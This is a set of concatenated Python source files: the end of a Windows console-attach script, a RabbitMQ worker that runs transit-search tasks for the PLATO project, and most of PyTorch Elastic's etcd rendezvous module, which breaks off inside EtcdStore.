pprint("Px is not installed")
sys.exit()
###
# Attach/detach console
def attach_console():
if ctypes.windll.kernel32.GetConsoleWindow() != 0:
dprint("Already attached to a console")
return
# Find parent cmd.exe if exists
pid = os.getpid()
while True:
try:
p = psutil.Process(pid)
except psutil.NoSuchProcess:
# No such parent - started without console
pid = -1
break
if os.path.basename(p.name()).lower() in ["cmd", "cmd.exe", "powershell", "powershell.exe"]:
# Found it
break
# Search parent
pid = p.ppid()
# Not found, started without console
if pid == -1:
dprint("No parent console to attach to")
return
dprint("Attaching to console " + str(pid))
if ctypes.windll.kernel32.AttachConsole(pid) == 0:
dprint("Attach failed with error " + str(ctypes.windll.kernel32.GetLastError()))
return
if ctypes.windll.kernel32.GetConsoleWindow() == 0:
dprint("Not a console window")
return
reopen_stdout()
def detach_console():
if ctypes.windll.kernel32.GetConsoleWindow() == 0:
return
restore_stdout()
if not ctypes.windll.kernel32.FreeConsole():
dprint("Free console failed with error " + str(ctypes.windll.kernel32.GetLastError()))
else:
dprint("Freed console successfully")
###
# Startup
def main():
multiprocessing.freeze_support()
sys.excepthook = handle_exceptions
parse_config()
run_pool()
if __name__ == "__main__":
main()
|
transit_search_worker_v1.py
|
#!../../../../datadir_local/virtualenv/bin/python3
# -*- coding: utf-8 -*-
# transit_search_worker_v1.py
"""
Run speed tests as requested through the RabbitMQ message queue
This version receives all messages via a single connection to the message queue, which is vulnerable to timing out
See:
https://stackoverflow.com/questions/14572020/handling-long-running-tasks-in-pika-rabbitmq/52951933#52951933
https://github.com/pika/pika/blob/0.12.0/examples/basic_consumer_threaded.py
"""
import functools
import json
import logging
import os
import threading
import time
import traceback
import argparse
import pika
from pika.exceptions import AMQPConnectionError
from plato_wp36 import settings, task_runner
from plato_wp36.results_logger import ResultsToRabbitMQ
def acknowledge_message(channel, delivery_tag):
"""
Acknowledge receipt of a RabbitMQ message, thereby preventing it from being sent to other worker nodes.
"""
channel.basic_ack(delivery_tag=delivery_tag)
def do_work(connection=None, channel=None, delivery_tag=None, body='[{"task":"null"}]'):
"""
Perform a list of tasks sent to us via a RabbitMQ message
"""
# Make sure we return to working directory after handling any exceptions
cwd = os.getcwd()
# Extract list of the jobs we are to do
job_descriptor = json.loads(body)
# Define results target
results_target = "rabbitmq"
# Instantiate worker
worker = task_runner.TaskRunner(results_target=results_target)
try:
# Check that job description is a dictionary
if not isinstance(job_descriptor, dict):
bad_message = job_descriptor
job_descriptor = {'job_name': 'untitled'}
raise ValueError("Bad message was not a dictionary: <{}>".format(bad_message))
# Do requested task
worker.do_work(job_name=job_descriptor.get('job_name', 'untitled'),
job_parameters=job_descriptor.get('job_parameters', {}),
clean_up_products=job_descriptor.get('clean_up', True),
task_list=job_descriptor['task_list'],
)
except Exception:
error_message = traceback.format_exc()
result_log = ResultsToRabbitMQ(results_target=results_target)
# File result to message queue
result_log.record_result(job_name=job_descriptor['job_name'],
parameters=job_descriptor.get('job_parameters', {}),
task_name='error_message', timestamp=time.time(),
result=error_message)
finally:
os.chdir(cwd)
# Acknowledge the message we've just processed
if connection is not None:
cb = functools.partial(acknowledge_message, channel, delivery_tag)
connection.add_callback_threadsafe(cb)
def message_callback(channel, method_frame, properties, body, args):
"""
Callback function called by RabbitMQ when we receive a message telling us to do some work.
"""
(connection, threads) = args
logging.info("--> Received {}".format(body))
delivery_tag = method_frame.delivery_tag
t = threading.Thread(target=do_work, args=(connection, channel, delivery_tag, body))
t.start()
threads.append(t)
def run_worker_tasks(broker="amqp://guest:guest@rabbitmq-service:5672", queue="tasks"):
"""
Set up a RabbitMQ consumer to call the <message_callback> function whenever we receive a message
telling us to do some work.
"""
while True:
try:
connection = pika.BlockingConnection(pika.URLParameters(url=broker))
channel = connection.channel()
channel.basic_qos(prefetch_count=1)
channel.queue_declare(queue=queue)
threads = []
on_message_callback = functools.partial(message_callback, args=(connection, threads))
channel.basic_consume(queue=queue, on_message_callback=on_message_callback)
logging.info('Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
except AMQPConnectionError:
logging.info("AMPQ connection failure")
time.sleep(30)
if __name__ == "__main__":
# Read command-line arguments
parser = argparse.ArgumentParser(description=__doc__)
args = parser.parse_args()
# Set up logging
log_file_path = os.path.join(settings.settings['dataPath'], 'plato_wp36.log')
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
handlers=[
logging.FileHandler(log_file_path),
logging.StreamHandler()
])
logger = logging.getLogger(__name__)
logger.info(__doc__.strip())
# Enter infinite loop of listening for RabbitMQ messages telling us to do work
run_worker_tasks()
|
etcd_rendezvous.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import datetime
import json
import logging
import random
import sys
import threading
import time
from base64 import b64decode, b64encode
from typing import Optional
import etcd
from torch.distributed import Store, TCPStore, register_rendezvous_handler
from torchelastic.rendezvous import (
RendezvousClosedException,
RendezvousHandler,
RendezvousNonRetryableError,
RendezvousTimeoutException,
)
_log_fmt = logging.Formatter("%(levelname)s %(asctime)s %(message)s")
_log_handler = logging.StreamHandler(sys.stderr)
_log_handler.setFormatter(_log_fmt)
log = logging.getLogger(__name__)
log.propagate = False
log.setLevel(logging.INFO)
log.addHandler(_log_handler)
# A retryable failure exception means that we were too late to make
# a desired state transition (e.g. because of a race condition),
# and should now restart from the beginning.
# A small delay is recommended to avoid spamming Etcd.
class EtcdRendezvousRetryableFailure(Exception):
pass
# Similar to retryable failure, but the new state we observed suggests we
# can re-try immediately, i.e. without a need for "safety delay".
class EtcdRendezvousRetryImmediately(Exception):
pass
# Default overall timeout for rendezvous barrier.
CONST_DEFAULT_OVERALL_TIMEOUT = 600
# Additional waiting amount after reaching num_min_workers,
# for the case rendezvous is elastic (min != max):
CONST_DEFAULT_LAST_CALL_TIMEOUT = 30
# Various constants used internally in EtcdRendezvous
CONST_ETCD_SETUP_TTL = 5
CONST_ETCD_FROZEN_TTL = 10
CONST_ETCD_JOINABLE_EPHEMERAL_TTL = 10
# Ephemeral node TTL for worker's keep-alive key:
CONST_WORKER_KEEPALIVE_TTL = 10
# TTL for the ephemeral run_id-specific directory. All rendezvous state data
# for a specific run_id (job instance) is contained within this directory.
# Its only role is to clean up rendezvous data from old runs (for the case when
# the etcd server is persistent); it has no effect on correctness, but it should be
# larger than any timeouts that a worker process is expected to survive:
CONST_RUNID_SUBROOT_TTL = 7200 # 2 hours
# Delay (sleep) for a small random amount to reduce CAS failures.
# This does not affect correctness, but will reduce requests to etcd server.
def cas_delay():
time.sleep(random.uniform(0, 0.1))
class EtcdRendezvousHandler(RendezvousHandler):
"""
Implements a :py:class:`torchelastic.rendezvous.RendezvousHandler`
interface backed by
:py:class:`torchelastic.rendezvous.etcd_rendezvous.EtcdRendezvous`.
Torchelastic uses a URL to configure the type of rendezvous to use and
to pass implementation specific configurations to the rendezvous module.
The basic etcd rendezvous configuration URL looks like the following
::
etcd://<etcd_address>:<port>/<job_id>?min_workers=<min_workers>&max_workers=<max_workers> # noqa W605
-- example --
etcd://localhost:2379/1234?min_workers=1&max_workers=3
The URL above is interpreted as follows:
1. Use the rendezvous handler that is registered with the ``etcd``
scheme
2. The ``etcd`` endpoint to use is ``localhost:2379``
3. ``job_id == 1234`` is used as the prefix in etcd (this allows one to
share a common etcd server for multiple jobs so long as the
``job_ids`` are guaranteed to be unique). Note that the job id can be
any string (e.g. does not need to be a number) as long as it is
unique.
4. ``min_workers=1`` and ``max_workers=3`` specifies a range for
membership size - torchelastic starts running the job as long as the
cluster size is greater than or equal to ``min_workers`` and admits
up to ``max_workers`` into the cluster.
Below are a full list of the parameters that can be passed to etcd
rendezvous:
+--------------------------------------------+--------------------------+
| Parameter | Description |
+============================================+==========================+
| min_workers | minimum number of |
| | workers for the |
| | rendezvous to be valid |
+--------------------------------------------+--------------------------+
| max_workers | maximum number of |
| | workers to admit |
+--------------------------------------------+--------------------------+
| timeout | total timeout within |
| | which next_rendezvous is |
| | expected to succeed |
| | (default 600s) |
+--------------------------------------------+--------------------------+
| last_call_timeout | additional wait amount |
| | (“last call”) after min |
| | number of workers has |
| | been reached (defaults |
| | to 30s) |
+--------------------------------------------+--------------------------+
| etcd_prefix | path prefix (from etcd |
| | root), inside which all |
| | etcd nodes will be |
| | created (defaults to |
| | ``/torchelastic/p2p``) |
+--------------------------------------------+--------------------------+
"""
def __init__(self, rdzv_impl):
self._rdzv_impl = rdzv_impl
def __del__(self):
# TODO: look into using weakref here instead.
del self._rdzv_impl
def next_rendezvous(self):
rdzv_version, rank, world_size = self._rdzv_impl.rendezvous_barrier()
log.info("Creating EtcdStore as the c10d::Store implementation")
store = self._rdzv_impl.setup_kv_store(rdzv_version)
return store, rank, world_size
def is_closed(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
return state["status"] == "closed"
except etcd.EtcdKeyNotFound:
# No rendezvous state, so it cannot be closed.
return False
def set_closed(self):
self._rdzv_impl.set_closed()
def num_nodes_waiting(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
if state["status"] == "final":
return state["num_workers_waiting"]
except etcd.EtcdKeyNotFound:
pass
return 0
# TODO: we should probably handle a few additional errors,
# like EtcdLeaderElectionInProgress and EtcdWatcherCleared. These are
# only relevant for multi-node Etcd ensemble. A simple retry would work,
# but is verbose to add everywhere. Consider wrapping the client calls
# into auto-retry for these errors?
#
class EtcdRendezvous(object):
"""
A rendezvous implementation that uses `etcd <https://etcd.io/>`__ as
the backend store.
"""
def __init__(
self,
endpoints,
prefix,
run_id,
num_min_workers,
num_max_workers,
timeout,
last_call_timeout,
**kwargs,
):
self._prefix = prefix
self._run_id = run_id
self._num_min_workers = num_min_workers
self._num_max_workers = num_max_workers
self._timeout = timeout
self._last_call_timeout = last_call_timeout
# For cleaning up TTL refresher threads (for ephemeral keys)
self._lease_run_id_stop = None
self._lease_this_rank_stop = None
if not self._prefix.endswith("/"):
self._prefix += "/"
self.client = etcd.Client(host=endpoints, allow_reconnect=True, **kwargs)
log.info("Etcd machines: " + str(self.client.machines))
# Setup a permanent prefix dir, if didn't exist
if self._prefix != "/":
self.create_path_if_not_exists(self._prefix)
# Lease a "sub-root" node specific to this job instance (run_id)
self.create_path_if_not_exists(self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL)
self._lease_run_id_stop = self.setup_lease_renewal(
self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL
)
# Subdir for all rendezvous work
self.create_path_if_not_exists(self.get_path("/rdzv"))
# Create a rendezvous version counter, if doesn't exist
try:
self.client.write(
key=self.get_path("/rdzv/version_counter"), value="0", prevExist=False
)
except etcd.EtcdAlreadyExist:
pass
def __del__(self):
# TODO: look into using weakref here instead.
if self._lease_run_id_stop is not None:
self._lease_run_id_stop.set()
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
def rendezvous_barrier(self):
"""
Main entry point for next rendezvous.
This method is blocking until rendezvous succeeds or a timeout occurs.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousTimeoutException - timeout waiting for rendezvous
RendezvousNonRetryableError - other persistent errors that
render the rendezvous non-retryable
RendezvousClosedException - rendezvous is or was closed while
waiting
"""
self._rendezvous_deadline = time.time() + self._timeout
while True:
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
log.info("Attempting to join next rendezvous")
try:
# Dis-own our lease in the previous rendezvous, if exists
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
return self.init_phase()
except EtcdRendezvousRetryImmediately:
# The type of failure suggests we can retry without delay
pass
except EtcdRendezvousRetryableFailure:
# In case of retryable failure, wait a small delay
# to avoid spamming etcd
time.sleep(1)
except RendezvousTimeoutException:
log.info("Rendezvous timeout occured in EtcdRendezvousHandler")
raise
except RendezvousClosedException:
log.info(
f"Rendezvous for run_id={self._run_id} was observed to be closed"
)
raise
except RendezvousNonRetryableError:
raise
except Exception as e:
# In case of a general exception, wait a small delay
# to avoid spamming etcd
# FIXME: there are a few things that fall under this like
# etcd.EtcdKeyNotFound, etc, which could be handled more explicitly.
log.info("Rendezvous attempt failed, will retry. Reason: " + str(e))
time.sleep(1)
def init_phase(self):
"""
Initially, the rendezvous state is expected to be one of:
1. empty (non-existent) - in this case we try to create a new one.
2. joinable - we try to join it.
3. final - we announce ourselves as waiting, and go into monitoring mode
Any other state is considered transitional, and will be retried after
a short delay.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousClosedException - current rendezvous was/is closed
EtcdRendezvousRetryableFailure - observed some intermediate
state, which is best handled by retrying later
"""
try:
active_version = self.try_create_rendezvous()
state = json.loads(active_version.value)
log.info("New rendezvous state created: " + str(state))
except etcd.EtcdAlreadyExist:
active_version, state = self.get_rdzv_state()
# Note: it is possible for above query to fail (etcd.EtcdKeyNotFound),
# but this is ok for us - just means we'll restart from beginning.
log.info("Observed existing rendezvous state: " + str(state))
if state["status"] == "closed":
raise RendezvousClosedException()
if state["status"] == "joinable":
return self.join_phase(state["version"])
if state["status"] == "final":
self.handle_existing_rendezvous(state["version"])
raise EtcdRendezvousRetryImmediately()
self.try_wait_for_state_change(etcd_index=active_version.etcd_index + 1)
raise EtcdRendezvousRetryableFailure()
def join_phase(self, expected_version):
"""
We observed a rendezvous state in 'joinable' state, and attempt to join this
particular version, and then wait for all other peers to join.
"""
# Failure to join will propagate an exception, causing a re-entry.
active_version, this_rank = self.join_rendezvous(expected_version)
state = json.loads(active_version.value)
log.info(
"Joined rendezvous version {} as rank {}. Full state: {}".format(
state["version"], this_rank, state
)
)
# If this worker was first to reach num_min_workers requirement,
# and rendezvous is still joinable (therefore it is elastic),
# then this worker will be responsible for waiting out the "last call"
# timeout and closing (i.e. transitioning to 'frozen') the rendezvous
# afterwards.
# As a safety against a potential failure of this worker (during the
# last call timeout), the rendezvous state is made ephemeral
# when min_num_workers is reached.
if this_rank == self._num_min_workers - 1 and state["status"] == "joinable":
log.info("Rank {} is responsible for join last call.".format(this_rank))
last_call_deadline = time.time() + self._last_call_timeout
self.handle_join_last_call(expected_version, last_call_deadline)
log.info("Rank {} finished join last call.".format(this_rank))
# Wait for rendezvous state to be frozen, which means a fixed set of peers
log.info("Waiting for remaining peers.")
active_version = self.wait_for_peers(expected_version)
state = json.loads(active_version.value)
assert (
state["version"] == expected_version
), "Logic error: failed to observe version mismatch"
return self.confirm_phase(expected_version, this_rank)
def confirm_phase(self, expected_version, this_rank):
"""
Once the rendezvous state transitions from 'joinable' to 'frozen',
we have every participant confirm their membership and setup per-member
keep-alive TTL keys, and then wait for all other participants to confirm,
which would then successfully conclude this rendezvous.
"""
log.info("All peers arrived. Confirming membership.")
self.confirm_membership(expected_version, this_rank)
log.info("Waiting for confirmations from all peers.")
active_version = self.wait_for_final(expected_version)
state = json.loads(active_version.value)
log.info(
"Rendezvous version {} is complete. Final state: {}".format(
state["version"], state
)
)
# Rendezvous version number; our rank in it; world size
return state["version"], this_rank, len(state["participants"])
def handle_existing_rendezvous(self, expected_version):
"""
Handle the case when there's an existing (state 'final') rendezvous already
in place, and we have to announce ourselves waiting, and wait until
the next rendezvous opportunity.
"""
# If state is 'final' -> increment num_workers_waiting
# Then, observe state changes:
# 1. if it's no longer final -> bail out and re-try
# 2. if keep alives are missing, destroy it and bail out.
active_state = self.announce_self_waiting(expected_version)
log.info(
"Added self to waiting list. Rendezvous full state: {}".format(
active_state.value
)
)
self.wait_for_rendezvous_to_free(expected_version)
log.info("Previously existing rendezvous state changed. Will re-try joining.")
def try_create_rendezvous(self):
"""
Create new rendezvous state or raise an exception that indicates
an unexpected state (e.g. already exists)
Raises:
RendezvousNonRetryableError - on unexpected state
"""
# Initially active_version is ephemeral - this is to handle the
# possibility that we might fail to complete the setup transaction,
# i.e. the transition "setup" -> "joinable".
active_version = self.client.write(
key=self.get_path("/rdzv/active_version"),
value=json.dumps({"status": "setup"}),
prevExist=False,
ttl=CONST_ETCD_SETUP_TTL,
)
try:
version_counter = self.client.get(self.get_path("/rdzv/version_counter"))
version_counter.value = str(int(version_counter.value) + 1)
self.client.update(version_counter)
except (etcd.EtcdKeyNotFound, etcd.EtcdCompareFailed):
raise RendezvousNonRetryableError(
"Unexpected state of EtcdRendezvousHandler, worker needs to die."
)
# Any failure below results in declaring a retryable rendezvous failure.
# The ephemeral /rdzv/active_version will expire and someone can then
# re-try the setup process.
# Create directory node for participant data
self.client.write(
key=self.get_path("/rdzv/v_{}".format(version_counter.value)),
value=None,
dir=True,
prevExist=False,
)
# Publish rendezvous version and signal it is ready-to-be-joined.
# If rendezvous was set closed just before this, a retry will happen,
# where the closed condition will be handled.
return self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(
{
"status": "joinable",
"version": version_counter.value,
"participants": [],
}
),
prev_value=active_version.value,
)
def join_rendezvous(self, expected_version):
"""
Helper method for the join phase.
"""
# Use compare-and-swap to add self to rendezvous state:
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "joinable":
raise EtcdRendezvousRetryableFailure(
"Rendezvous state became non-joinable before we could join. "
"Must join next one."
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
assert (
len(state["participants"]) < self._num_max_workers
), "Logic error: joinable rendezvous should always have space left"
this_rank = len(state["participants"])
state["participants"].append(this_rank)
# When reaching min workers, or changing state to frozen, we'll set
# the active_version node to be ephemeral.
if len(state["participants"]) == self._num_max_workers:
state["status"] = "frozen"
state["keep_alives"] = []
set_ttl = CONST_ETCD_FROZEN_TTL
elif len(state["participants"]) >= self._num_min_workers:
set_ttl = CONST_ETCD_JOINABLE_EPHEMERAL_TTL
else:
set_ttl = None
try:
# Compare-and-swap.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=set_ttl,
)
# We succeeded joining.
return active_version, this_rank
except etcd.EtcdCompareFailed:
log.info("Join rendezvous CAS unsuccessful, retrying")
def wait_for_peers(self, expected_version):
"""
Helper method for the join phase.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Success, all peers arrived.
return active_version
elif state["status"] == "joinable" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def confirm_membership(self, expected_version, this_rank):
"""
Helper method for the confirm phase
"""
# Compare-and-swap loop
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "frozen":
raise EtcdRendezvousRetryImmediately(
"Rendezvous no longer frozen, before we confirmed. "
"Must join next one"
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
this_lease_key = self.get_path(
"/rdzv/v_{}/rank_{}".format(expected_version, this_rank)
)
self.client.set(this_lease_key, value=None, ttl=CONST_WORKER_KEEPALIVE_TTL)
state["keep_alives"].append(this_lease_key)
if len(state["keep_alives"]) == len(state["participants"]):
# Everyone confirmed (this rank is last to do so)
state["status"] = "final"
state["num_workers_waiting"] = 0
finalize = True
else:
finalize = False
try:
# Compare-and-swap. If new state is still frozen, keep it ephemeral.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=None if finalize else CONST_ETCD_FROZEN_TTL,
)
self._lease_this_rank_stop = self.setup_lease_renewal(
this_lease_key, ttl=CONST_WORKER_KEEPALIVE_TTL
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Confirm membership CAS unsuccessful, retrying")
def wait_for_final(self, expected_version):
"""
Helper method for the confirm phase
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "final" and state["version"] == expected_version:
                # Success. This rendezvous is final, and we accept it.
return active_version
elif state["status"] == "frozen" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def announce_self_waiting(self, expected_version):
"""
Announce this worker is waiting (via num_workers_waiting counter) to join next
rendezvous, but only if state and version match.
"""
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "final" or state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately()
# Increment counter to signal an additional waiting worker.
state["num_workers_waiting"] += 1
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Announce self as waiting CAS unsuccessful, retrying")
def wait_for_rendezvous_to_free(self, expected_version):
"""
When there's an existing valid rendezvous in state 'final', we have to
wait until the next opportunity to join.
Such opportunity may come from:
1. rendezvous state changed by someone else, in which case we unblock and retry.
2. rendezvous becomes invalid because at least one member failed to renew their
leased keep_alive node. We detect this, and destroy the rendezvous.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] != "final" or state["version"] != expected_version:
return
# Check if current rendezvous state is valid, in the sense that all
# its members are alive (renewing their lease).
# If not, try destroy this rendezvous, so a new one can be created.
alive_members = self.client.get(
self.get_path("/rdzv/v_{version}".format(version=expected_version))
)
keep_alive_keys = [ch.key for ch in alive_members.children]
for key in state["keep_alives"]:
if key not in keep_alive_keys:
# This participant didn't renew their lease. We'll declare this
# rendezvous version as dead (but only if it hadn't changed)
log.info("Keep-alive key {} is not renewed.".format(key))
log.info(
"Rendevous version {} is incomplete. ".format(expected_version)
)
log.info("Attempting to destroy it.")
# Compare-and-delete operation. Throws if compare failed,
# which means rendezvous was already destroyed/re-created/closed,
# and we can try to re-enter the barrier.
self.client.delete(
key=self.get_path("/rdzv/active_version"),
prevValue=active_version.value,
)
log.info(
"Destroyed rendezvous version {} successfully.".format(
expected_version
)
)
# We can return (and retry) immediately
return
# Existing rendezvous seems valid, no reason to destroy it.
# We just have to wait until something changes and re-check.
try:
overall_timeout = (
max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
)
self.client.watch(
key=self.get_path("/rdzv"),
index=active_version.etcd_index + 1,
recursive=True,
timeout=overall_timeout,
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
active_version, state = self.get_rdzv_state()
def handle_join_last_call(self, expected_version, deadline):
"""
After we reach min number of workers, one particular worker takes on the
responsibility of waiting an additional timeout before closing the join window.
If the worker responsible for this fails, the rendezvous will be destroyed due
to expiring TTL, and the other participants will re-rendezvous.
Here we expect to see state <joinable, expected_version>
Exit gracefully if either:
1. state becomes <frozen, expected_version>
2. timeout happens (reaching deadline), in which case
        we try the transition to <frozen, expected_version>
Exit with exception otherwise.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Worker set became frozen before last-call timeout. This is possible
                # when num_max_workers is reached before the timeout.
return
if state["status"] != "joinable" or state["version"] != expected_version:
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
# If timeout occurred, attempt a state transition (joinable -> frozen)
if time.time() >= deadline:
state["status"] = "frozen"
state["keep_alives"] = []
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=CONST_ETCD_FROZEN_TTL,
)
# We successfully made this rendezvous frozen.
return
except etcd.EtcdCompareFailed:
log.info("Join last-call transition CAS unsuccessful. Will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
continue
# Timeout did not occur, so we must refresh TTL, and wait for
# further changes. Note: we only want TTL to be refreshed if
# state is still joinable, hence we use CAS for that here,
# even though we don't change any of the data.
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=active_version.value,
prev_value=active_version.value,
ttl=CONST_ETCD_JOINABLE_EPHEMERAL_TTL,
)
# Minimize "oversleeping":
timeout = min(
CONST_ETCD_JOINABLE_EPHEMERAL_TTL / 2,
deadline - time.time() + 1.0, # Oversleeping by 1s is ok.
)
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1, timeout=timeout
)
except etcd.EtcdCompareFailed:
log.info("Join last-call TTL refresh CAS unsuccessful, will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
def set_closed(self):
"""
Mark rendezvous 'closed' for current run_id, which is used to signal other
participants to not attempt to perform (re-)rendezvous. This is useful
when one of the workers decides the job is complete.
"""
while True:
active_version, state = self.get_rdzv_state()
if state["status"] == "closed":
# Already closed by someone else.
return
state["status"] = "closed"
try:
self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Set closed CAS unsuccessful, retrying")
cas_delay()
def get_rdzv_state(self):
active_version = self.client.get(key=self.get_path("/rdzv/active_version"))
return active_version, json.loads(active_version.value)
def try_wait_for_state_change(self, etcd_index, timeout=None):
        # Don't sleep past the overall deadline (by more than ~1s)
overall_timeout = max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
timeout = overall_timeout if timeout is None else min(timeout, overall_timeout)
try:
self.client.watch(
self.get_path("/rdzv/active_version"), index=etcd_index, timeout=timeout
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
# Unfortunately, we have to do another fetch in order to get last etcd_index.
return self.get_rdzv_state()
def get_path(self, path):
if not path.startswith("/"):
path = "/" + path
return "{prefix}run_{run_id}{path}".format(
prefix=self._prefix, run_id=self._run_id, path=path
)
def create_path_if_not_exists(self, full_path, ttl=None):
try:
self.client.write(
key=full_path, value=None, dir=True, prevExist=False, ttl=ttl
)
except etcd.EtcdAlreadyExist:
pass
def setup_lease_renewal(self, full_path, ttl):
# NOTE: For ephemeral key TTL renewal (~lease) to work correctly,
# make sure you don't call any long-blocking methods that do not
        # release Python's GIL! An example of this is calling a pybind11
# extension function that is blocking / long-running, but is not
# doing a scoped release of the GIL.
def lease_worker(client, path, ttl, stop_event):
while True:
try:
client.refresh(path, ttl=ttl)
except etcd.EtcdKeyNotFound:
break
if stop_event.wait(timeout=ttl / 2):
break
lease_stop_event = threading.Event()
lease_thread = threading.Thread(
target=lease_worker, args=(self.client, full_path, ttl, lease_stop_event)
)
lease_thread.daemon = True
lease_thread.start()
return lease_stop_event
def store_extra_data(self, rdzv_version, key, value):
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
try:
# If first time we are storing anything:
extra_data = self.client.write(
key=node, value=json.dumps({key: value}), prevExist=False
)
return
except etcd.EtcdAlreadyExist:
pass
# CAS loop, to make sure we don't lose concurrent stores.
while True:
# We never delete extra_data. Failure here should be fatal, no special handling.
extra_data = self.client.get(node)
new_extra_data_value = json.loads(extra_data.value)
new_extra_data_value[key] = value
try:
extra_data = self.client.test_and_set(
key=node,
value=json.dumps(new_extra_data_value),
prev_value=extra_data.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Store extra_data CAS unsuccessful, retrying")
time.sleep(0.1)
def load_extra_data(self, rdzv_version, key, timeout=None):
# 'extra_data' node itself, and the directory it is located in:
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
node_dir = self.get_path("/rdzv/v_{}".format(rdzv_version))
# TODO: implement timeout
# https://github.com/pytorch/elastic/issues/12
while True:
# Combined wait for the node itself, and the key inside it.
root = self.client.get(node_dir)
# Find the extra_data node, if it exists
extra_data = [n for n in root.children if n.key == node]
assert len(extra_data) <= 1
# Node for extra_data exists, check the desired key inside it.
if len(extra_data) == 1:
extra_data_dict = json.loads(extra_data[0].value)
if key in extra_data_dict:
return extra_data_dict[key]
            # The 'extra_data' node doesn't exist, or the key isn't published yet.
# Wait for interesting events on the extra_data node and retry.
try:
self.client.watch(node, index=root.etcd_index + 1)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
def setup_kv_store(self, rdzv_version):
store_path = self.get_path(f"/rdzv/v_{rdzv_version}/kv")
self.create_path_if_not_exists(store_path)
return EtcdStore(etcd_client=self.client, etcd_store_prefix=store_path)
# pyre-fixme[11]: Annotation `Store` is not defined as a type.
class EtcdStore(Store):
"""
Implements a c10 Store interface by piggybacking on the rendezvous etcd
instance. This is the store object returned by ``EtcdRendezvous``
"""
def __init__(
self,
etcd_client,
etcd_store_prefix,
timeout: Optional[datetime.timedelta] = None,
):
super().__init__() # required for pybind trampoline.
self.client = etcd_client
self.prefix = etcd_store_prefix
# Default timeout same as in c10d/Store.hpp
self.timeout = (
timeout if timeout is not None else datetime.timedelta(seconds=300)
)
if not self.prefix.endswith("/"):
self.prefix += "/"
def set(self, key, value):
"""
Write a key/value pair into ``EtcdStore``.
Both key and value may be either Python ``str`` or ``bytes``.
"""
self.client.set(key=self.prefix + self._encode(key), value=self._encode(value))
def get(self, key) -> bytes:
"""
Get a value by key, possibly doing a blocking wait.
If key is not immediately present, will do a blocking wait
for at most ``timeout`` duration or until the key is published.
Returns:
value ``(bytes)``
Raises:
LookupError - If key still not published after timeout
"""
b64_key = self.prefix + self._encode(key)
kvs = self._try_wait_get([b64_key])
if kvs is None:
raise LookupError(f"Key {key} not found in EtcdStore")
return self._decode(kvs[b64_key])
def add(self, key, num: int) -> int:
"""
Atomically increment a value by an integer amount. The integer is
represented as a string using base 10. If key is not present,
a default value of ``0`` will be assumed.
Returns:
the new (incremented) value
"""
